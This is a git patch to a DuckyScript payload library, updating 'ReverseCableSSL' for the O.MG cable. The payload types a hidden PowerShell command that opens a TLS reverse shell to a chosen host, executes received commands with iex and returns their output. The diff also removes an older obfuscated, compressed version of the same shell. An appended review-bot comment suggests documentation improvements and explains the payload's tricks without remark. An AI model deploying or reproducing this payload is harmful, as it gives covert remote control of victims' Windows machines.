From 0f2a230661d87f1c4a9d0907584b92cc424a4a9a Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Wed, 7 Jun 2023 15:17:52 +0200
Subject: [PATCH] Updated ReverseCableSSL
Lifted ReverseCableSSL to a more recent version of DuckyScript
---
 .../remote_access/ReverseCableSSL/payload.txt | 59 ++++++++++---------
 1 file changed, 32 insertions(+), 27 deletions(-)
diff --git a/payloads/library/remote_access/ReverseCableSSL/payload.txt b/payloads/library/remote_access/ReverseCableSSL/payload.txt
index 9cc78cc..72792cd 100644
--- a/payloads/library/remote_access/ReverseCableSSL/payload.txt
+++ b/payloads/library/remote_access/ReverseCableSSL/payload.txt
@@ -1,38 +1,43 @@ REM ReverseCableSSL -REM Version 1.0 +REM Version 2.0 REM OS: Windows REM Author: 0iphor13 -REM Requirements: OMG Firmware v.2.5 or higher +REM Requirements: OMG Firmware v.3.0 or higher -REM Getting encrypted remote access via obfuscated powershell code +REM Getting encrypted remote access via powershell + +REM Define your receiving Host below +DEFINE #ADDRESS '0.0.0.0' +DEFINE #PORT 4444 + +FUNCTION Detect_Finished() +CAPSLOCK +DELAY 100 +CAPSLOCK +DELAY 100 +CAPSLOCK +DELAY 100 +CAPSLOCK +END_FUNCTION DELAY 500 +REM Define your language below DUCKY_LANG de DELAY 1500 GUI r DELAY 500 -STRING powershell -NoP -NonI -w hidden -DELAY 500 -ENTER -DELAY 300 -STRING $IP='0.0.0.0';$PORT=PORT;( -joIn [reGEX]::mAtcHeS( (")''NIOj-'X'+]3,1[)(gnirtsOt.ecNErefeRpesobreV$ "+'('+'& '+(('b'+'8'+'J ')-crepLAce 'b8J',[ChAR]124)+")'$','8yj'(EcalpER.)'|',)801]RaHC[+021]RaHC[+25]RaHC[((EcalpER.)93]RaHC[]GniRtS[,)501]RaHC[+07]RaHC[+18]RaHC[((EcalpER.)')iFQiFQNIO +STRINGLN powershell -NoP -NonI -W H +DELAY 1000 +STRING $01=[Text.Encoding]::ASCII.GetBytes("`n[+] Connection received - O.MG@$env:USERNAME/$env:COMPUTERNAME `n`n"); +DEFINE #VAR #DfdGgfdbOMG +STRING $c=new-OBJecT Net.Sockets.TcpClient(#ADDRESS,#PORT); +STRING $s=$c.GetStream(); +DEFINE #DfdGgfdbOMG NeW-oBjECt +STRING $sSL=#DfdGgfdbOMG System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])); +STRING $sSL.AuthenticateAsClient('01phOri3.omg', $null, "Tls12", $false); +STRING $w=#VAR System.IO.StreamWriter($sSL);$sSL.write($01,0,$01.Length);$w.Write('OMG@PS ' + (pwd).Path + '> ');$w.flush();[byte[]]$b = 0..65535|%{0};while(($i=$sSL.Read($b, 0, $b.Length)) -ne 0) +STRING {$D=(#DfdGgfdbOMG -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$Y=(iex $D | Out-String ) 2>&1; +STRING $X=$Y + 'OMG@PS ' + (Get-LoCatIon).Path + '> '; +STRINGLN $Z=([text.encoding]::ASCII).GetBytes($X);$sSL.Write($Z,0,$Z.Length);$sSL.Flush()};exIT DELAY 100 -STRING 
j-]52,42,4[CEPS'+'moC:VNE8yj "+('(.{0'+'}+{0} ') -F [chAR]39+'l'+'x4) '+'(Dne'+'OTDAer'+'.'+') '+(')'+'II'+'CSa::'+']g'+'nidoCNE.tX{'+'0}+{'+'0'+'}e'+'T.M'+'eTS'+'ys[, ') -F[cHaR]39+'))Ss'+'ErPMoceD::]EDo'+'MNO'+'iSsErpMOc.'+'No'+'is'+'s'+'ERpmoc.'+'OI'+'.met'+'SY'+'s'+'[ '+', '+('{0}+'+'{'+'0}) -DELAY 100 -STRING iFQ'+'==AA/hj'+'7zf1K/Vp7dl46NLLtuomB'+'Vjldn'+'vd'+'O7Q'+'uWq1vWq'+'dEK4{'+'0'+'}+{0}'+'2LO1C1nN'+'J'+'KbGpPgNZ2{0}+{'+'0}kcRl'+'w0TqY5392e'+'0VwS54cTkkC'+'5'+'s19h'+'3sI+Zgvt'+'7{0}+{'+'0}o29O7scluP{'+'0}'+'+{0}hkQQ'+'Wj'+'LZv'+'JBlFC'+'e'+'Th9'+'aG'+'5KLFOV'+'i/kg'+'Yxa'+'Nt'+'Et/1gZ'+'fyn4I -DELAY 100 -STRING b99DLte{0}+'+'{0}hwi'+'1'+'m'+'gaGk'+'g5RTQ'+'F9'+'K'+'PhoE5w'+'Vfef0CI'+'yk'+'sf'+'4'+'69'+'AZdU'+'cTsit2F'+'ZaJnXjBzU'+'Dvn'+'LmXn'+'Lg{'+'0}'+'+{'+'0}'+'kF'+'denv8tt+2I/5'+'7vfyhfh0'+'q'+'YBe'+'fWqTbiG'+'2wsmzFoYrfq3du9'+'G2v'+'ni2Pxi'+'u5'+'E+rl2/kJ6h0z2DI'+'rdGbIEs'+'C'+'yY8I'+'9Qb'+'/'+'H -DELAY 100 -STRING 4'+'pZVcpRQ6WNp'+'T'+'2bR00gHk85r'+'phUNFfbdAoeV7mI22'+'+6zpfqc'+'WTqo7zkk'+'OX'+'J'+'X6Qw'+'LdsnwdnrsQo'+'uWm'+'hzAA5IrSgng3'+'a'+'WtY18rl'+'AS/6dW68K'+'K'+'3VYR0rEv'+'6VI'+'pH2S{0}+{0}Nog'+'b'+'bcMsd'+'FGpbNXc'+'eCN'+'6tQ'+'MCri'+'gl'+'g'+'elpR'+'IPOhP'+'KeLGV'+'/'+'7p'+'J'+'ZJYq6+h'+'Ciet -DELAY 100 -STRING n'+'Qt'+'MlG'+'EfB7'+'hP'+'o'+'nAgs'+'r{0}+{0}NR'+'gf8'+'oY8H3RInOlx1'+'DxbJxwL'+'x'+'NKIkcn'+'h{0}+{0}QUqm{0}+{0}uCo'+'qD7HGJr'+'Z/dmXH'+'aiYxDK'+'P+lv{0}+{'+'0}WFrEk'+'g{0'+'}+{0}A0PBo{0}+'+'{'+'0}wuOzmwVW'+'{0}+{0}UBS/{0}+{0}Y/'+'elW'+'+tHcXNgWO5'+'wBB/Mf'+'gle6u'+'Smr0{0}'+'+{0}gsQIzh8IcULL11 -DELAY 100 -STRING kglce'+'5F'+'Z7VWZMS3KxF'+'AE3w6co7'+'V'+'JdJSWTwI'+'TO'+'JjdtUmK'+'BDNYS'+'EpJPV'+'0Sqr'+'4Dwv'+'3'+'e'+'QZomXGG'+'J'+'7g/{'+'0}+{0'+'}9G'+'VsOAS2r0/'+'+{'+'0'+'}+{0}2N'+'xdKe3e9+efHiS{0}+'+'{0}'+'od3mfSY3'+'df3ftWM'+'bE'+'SNUWt'+'A'+'Hm+AiPaTCQ6A5q'+'Q4u'+'VrOk7mKl46E'+'Xsi'+'I8ve2PEwo'+'9bv -DELAY 100 -STRING P'+'VfiFQ ')-F [chAR]39+('(gN'+'I'+'R'+'Ts4'+'6EsAbmorFrNf'+'+rNf::]TREvn'+'oC'+'[ 
').replace('rNf',[STRINg][CHar]39)+((']'+'mAEr'+'TSyroMem'+'.oI'+'.m6j'+'x+6'+'jx'+'et'+'SY'+'s6jx+6jx[ ')-rEPLaCe '6jx',[Char]39)+('(MaFy'+'5+Fy5E'+'RTS'+'F'+'y5'+'+F'+'y5'+'EtAlf'+'Ed.noi'+'S'+'SERP'+'F -DELAY 100 -STRING y'+'5'+'+Fy5M'+'O'+'C.Oi ').replACE('Fy5',[STRINg][ChAr]39)+'tc'+'ejBO'+'-weN '+'( '+(('(rE'+'dA'+'eRmAE'+'P5'+'d+P5dr'+'P5d+P'+'5dTS'+'.oI ') -repLaCE 'P5d',[CHAr]39)+('tcejBORrV+Rr'+'V-'+'weNRr'+'V'+'+RrV('+' ').RepLace('RrV',[STrING][cHaR]39)+('XI'+'B( ').RePlAce(([chAR]88+[chAR]73+[chAR]6 -DELAY 100 -STRING 6),[STrIng][chAR]39)+''), '.' , ('RI'+'G'+'HTtoLefT')) )| IeX -DELAY 200 -ENTER \ No newline at end of file +Detect_Finished()
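Review bot: The updated header line `REM Getting encrypted remote access via powershell` is incomplete as documentation, because the added `$sSL=#DfdGgfdbOMG System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))` line installs a validation callback that returns `$True` for every certificate, so the session is encrypted but the peer is never authenticated; the header should state this plainly, e.g. `REM Note: certificate validation is disabled; the remote endpoint is not authenticated`. `DEFINE #VAR #DfdGgfdbOMG` appears before `DEFINE #DfdGgfdbOMG NeW-oBjECt`, so the `$w=#VAR System.IO.StreamWriter($sSL)` line relies on DEFINE substitution being applied recursively regardless of declaration order — presumably supported by the firmware v3.0 the header now requires, but a `REM` explaining the two-level indirection would keep it from being read as a typo. `Detect_Finished()` detects nothing: it toggles CAPSLOCK four times (leaving the LED state as it was) as a visible completion signal after the hidden PowerShell window has exited, so a comment such as `REM Blinks CAPSLOCK 4x to signal that the payload has finished` above the FUNCTION line would document its purpose.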